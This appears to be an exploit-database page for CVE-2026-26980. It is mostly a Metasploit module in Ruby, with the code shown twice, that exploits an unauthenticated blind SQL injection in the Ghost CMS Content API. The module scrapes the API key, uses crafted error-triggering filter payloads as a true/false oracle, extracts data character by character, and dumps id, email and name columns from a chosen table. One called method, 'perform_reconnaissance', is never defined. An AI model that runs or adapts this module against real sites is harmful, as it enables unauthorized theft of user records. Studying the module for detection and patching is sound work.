📄 Ghost CMS 6.19.0 SQL Injection_PACKETSTORM:219677

9.4 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Description

This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0...

Visit Original Source

Basic Information

ID PACKETSTORM:219677

Published Apr 23, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Ghost CMS 6.19.0 Unauthenticated Content API Blind SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://ghost.org/ |
==================================================================================================================================

[+] Summary : This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API (versions 3.24.0 to 6.19.0).

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ghost CMS Unauthenticated SQL Injection via Content API',
'Description' => %q{
Ghost CMS versions 3.24.0 through 6.19.0 contain an unauthenticated SQL injection
vulnerability in the Content API.
},
'Author' => [
'indoushka'
],
'References' => [
['CVE', '2026-26980']
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2026-03-30'
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path for Ghost installation', '/']),
OptString.new('API_KEY', [false, 'Ghost Content API Key', '']),
OptString.new('API_PATH', [false, 'Content API path', '']),
OptEnum.new('DBMS', [true, 'Database engine', 'sqlite', ['sqlite', 'mysql']]),
OptString.new('TABLE', [false, 'Specific table', '']),
OptString.new('COLUMNS', [false, 'Columns', '']),
OptInt.new('THREADS', [true, 'Threads', 15]),
OptInt.new('TIMEOUT', [true, 'Timeout', 10])
])
end

def setup
@base_uri = normalize_uri(target_uri.path)
@api_key = datastore['API_KEY']
@api_path = datastore['API_PATH']
@dbms = datastore['DBMS']
@threads = datastore['THREADS']
@timeout = datastore['TIMEOUT']
@table_to_dump = datastore['TABLE']
@columns = datastore['COLUMNS']&.split(',')&.map(&:strip)

@charset = "$./0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^&*()+-=".chars
@error_indicator = "InternalServerError"
@api_endpoint = nil
@tag_slug = nil
@tag_id = nil
@url_template = nil
end

def run_host(ip)
print_status("Ghost SQLi CVE-2026-26980")
print_status("Target: #{peer}")

unless discover_api_endpoint
print_error("Discovery failed")
return
end

unless verify_oracle
print_error("Oracle failed")
return
end

if @table_to_dump && !@table_to_dump.empty?
dump_table(@table_to_dump)
else
perform_reconnaissance
end
end

def discover_api_endpoint
res = send_request_cgi({
'uri' => normalize_uri(@base_uri),
'method' => 'GET'
})

return false unless res && res.code == 200

if res.body =~ /data-key="([a-f0-9]+)"/
@api_key = Regexp.last_match(1)
else
return false
end

if res.body =~ /data-api="([^"]+)"/
api_raw = Regexp.last_match(1)
path = URI.parse(api_raw).path
@api_endpoint = normalize_uri(@base_uri, path)
@api_endpoint = "#{@api_endpoint}/"
else
return false
end

discover_tag_from_api
end

def discover_tag_from_api
res = send_request_cgi({
'uri' => normalize_uri(@api_endpoint, 'tags/'),
'method' => 'GET',
'vars_get' => { 'key' => @api_key }
})

return false unless res && res.code == 200

json = JSON.parse(res.body)
return false unless json['tags'] && json['tags'][0]

@tag_slug = json['tags'][0]['slug']
@tag_id = json['tags'][0]['id']

slug = Rex::Text.uri_encode(@tag_slug.to_s)
@url_template = "#{@api_endpoint}tags/?key=#{@api_key}&filter=slug:['*',#{slug}]&limit=all"

true
rescue
false
end

def verify_oracle
check_condition("1=1") && !check_condition("1=2")
end

def check_condition(condition)
if @dbms == "mysql"
error_payload = "(SELECT exp(710))"
else
error_payload = "(SELECT abs(-9223372036854775808))"
end

payload = " OR CASE WHEN (#{condition}) THEN #{error_payload} ELSE 0 END AND slug="
url = @url_template.gsub("*", payload, 1)

res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'timeout' => @timeout
})

return false unless res && res.body

res.body =~ /badrequesterror/i || res.body =~ /#{@error_indicator}/i
rescue
false
end

def get_query_length(query)
length = 0
[64, 32, 16, 8, 4, 2, 1].each do |bit|
if check_condition("LENGTH((#{query}))>=#{length + bit}")
length += bit
end
end
length
end

def get_query_char(query, position)
low = 0
high = @charset.length - 1

while low < high
mid = (low + high) / 2
char_code = @charset[mid].ord

condition = "ASCII(SUBSTR((#{query}),#{position},1))>=#{char_code}"

if check_condition(condition)
low = mid + 1
else
high = mid
end
end

@charset[low]
end

def extract_data(query, label, force_length = nil)
length = force_length || get_query_length(query)
return "" if length.nil? || length.to_i <= 0

result = []
(1..length).each do |pos|
result << get_query_char(query, pos)
end

result.join
end

def dump_table(table_name)
print_status("Dumping: #{table_name}")

count = get_query_length("SELECT COUNT(*) FROM #{table_name}")
return if count <= 0

(0...count).each do |i|
row = {}
['id', 'email', 'name'].each do |col|
row[col] = extract_data("SELECT #{col} FROM #{table_name} LIMIT 1 OFFSET #{i}", col)
end
end
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-23T16:46:53",
    "description": "This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0...",
    "published": "2026-04-23T00:00:00",
    "modified": "2026-04-23T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219677",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-26980"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Ghost CMS 6.19.0 Unauthenticated Content API Blind SQL Injection                                                 |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://ghost.org/                                                                                               |\n    ==================================================================================================================================\n    \n    [+] Summary    : This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API (versions 3.24.0 to 6.19.0).\n    \n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Auxiliary::Report\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Auxiliary::Scanner\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Ghost CMS Unauthenticated SQL Injection via Content API',\n            'Description' => %q{\n              Ghost CMS versions 3.24.0 through 6.19.0 contain an unauthenticated SQL injection\n              vulnerability in the Content API.\n            },\n            'Author' => [\n              'indoushka'\n            ],\n            'References' => [\n              ['CVE', '2026-26980']\n            ],\n            'License' => MSF_LICENSE,\n            'DisclosureDate' => '2026-03-30'\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Base path for Ghost installation', '/']),\n          OptString.new('API_KEY', [false, 'Ghost Content API Key', '']),\n          OptString.new('API_PATH', [false, 'Content API path', '']),\n          OptEnum.new('DBMS', [true, 'Database engine', 'sqlite', ['sqlite', 'mysql']]),\n          OptString.new('TABLE', [false, 'Specific table', '']),\n          OptString.new('COLUMNS', [false, 'Columns', '']),\n          OptInt.new('THREADS', [true, 'Threads', 15]),\n          OptInt.new('TIMEOUT', [true, 'Timeout', 10])\n        ])\n      end\n    \n      def setup\n        @base_uri = normalize_uri(target_uri.path)\n        @api_key = datastore['API_KEY']\n        @api_path = datastore['API_PATH']\n        @dbms = datastore['DBMS']\n        @threads = datastore['THREADS']\n        @timeout = datastore['TIMEOUT']\n        @table_to_dump = datastore['TABLE']\n        @columns = datastore['COLUMNS']&.split(',')&.map(&:strip)\n    \n        @charset = \"$./0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^&*()+-=\".chars\n        @error_indicator = \"InternalServerError\"\n        @api_endpoint = nil\n        @tag_slug = nil\n        @tag_id = nil\n        @url_template = nil\n      end\n    \n      def run_host(ip)\n        print_status(\"Ghost SQLi CVE-2026-26980\")\n        print_status(\"Target: #{peer}\")\n    \n        unless discover_api_endpoint\n          print_error(\"Discovery failed\")\n          return\n        end\n    \n        unless verify_oracle\n          print_error(\"Oracle failed\")\n          return\n        end\n    \n        if @table_to_dump && !@table_to_dump.empty?\n          dump_table(@table_to_dump)\n        else\n          perform_reconnaissance\n        end\n      end\n    \n      def discover_api_endpoint\n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_uri),\n          'method' => 'GET'\n        })\n    \n        return false unless res && res.code == 200\n    \n        if res.body =~ /data-key=\"([a-f0-9]+)\"/\n          @api_key = Regexp.last_match(1)\n        else\n          return false\n        end\n    \n        if res.body =~ /data-api=\"([^\"]+)\"/\n          api_raw = Regexp.last_match(1)\n          path = URI.parse(api_raw).path\n          @api_endpoint = normalize_uri(@base_uri, path)\n          @api_endpoint = \"#{@api_endpoint}/\"\n        else\n          return false\n        end\n    \n        discover_tag_from_api\n      end\n    \n      def discover_tag_from_api\n        res = send_request_cgi({\n          'uri' => normalize_uri(@api_endpoint, 'tags/'),\n          'method' => 'GET',\n          'vars_get' => { 'key' => @api_key }\n        })\n    \n        return false unless res && res.code == 200\n    \n        json = JSON.parse(res.body)\n        return false unless json['tags'] && json['tags'][0]\n    \n        @tag_slug = json['tags'][0]['slug']\n        @tag_id = json['tags'][0]['id']\n    \n        slug = Rex::Text.uri_encode(@tag_slug.to_s)\n        @url_template = \"#{@api_endpoint}tags/?key=#{@api_key}&filter=slug:['*',#{slug}]&limit=all\"\n    \n        true\n      rescue\n        false\n      end\n    \n      def verify_oracle\n        check_condition(\"1=1\") && !check_condition(\"1=2\")\n      end\n    \n      def check_condition(condition)\n        if @dbms == \"mysql\"\n          error_payload = \"(SELECT exp(710))\"\n        else\n          error_payload = \"(SELECT abs(-9223372036854775808))\"\n        end\n    \n        payload = \" OR CASE WHEN (#{condition}) THEN #{error_payload} ELSE 0 END AND slug=\"\n        url = @url_template.gsub(\"*\", payload, 1)\n    \n        res = send_request_cgi({\n          'uri' => url,\n          'method' => 'GET',\n          'timeout' => @timeout\n        })\n    \n        return false unless res && res.body\n    \n        res.body =~ /badrequesterror/i || res.body =~ /#{@error_indicator}/i\n      rescue\n        false\n      end\n    \n      def get_query_length(query)\n        length = 0\n        [64, 32, 16, 8, 4, 2, 1].each do |bit|\n          if check_condition(\"LENGTH((#{query}))>=#{length + bit}\")\n            length += bit\n          end\n        end\n        length\n      end\n    \n      def get_query_char(query, position)\n        low = 0\n        high = @charset.length - 1\n    \n        while low < high\n          mid = (low + high) / 2\n          char_code = @charset[mid].ord\n    \n          condition = \"ASCII(SUBSTR((#{query}),#{position},1))>=#{char_code}\"\n    \n          if check_condition(condition)\n            low = mid + 1\n          else\n            high = mid\n          end\n        end\n    \n        @charset[low]\n      end\n    \n      def extract_data(query, label, force_length = nil)\n        length = force_length || get_query_length(query)\n        return \"\" if length.nil? || length.to_i <= 0\n    \n        result = []\n        (1..length).each do |pos|\n          result << get_query_char(query, pos)\n        end\n    \n        result.join\n      end\n    \n      def dump_table(table_name)\n        print_status(\"Dumping: #{table_name}\")\n    \n        count = get_query_length(\"SELECT COUNT(*) FROM #{table_name}\")\n        return if count <= 0\n    \n        (0...count).each do |i|\n          row = {}\n          ['id', 'email', 'name'].each do |col|\n            row[col] = extract_data(\"SELECT #{col} FROM #{table_name} LIMIT 1 OFFSET #{i}\", col)\n          end\n        end\n      end\n    end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219677",
    "cvss": {
        "score": 9.4,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219677/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply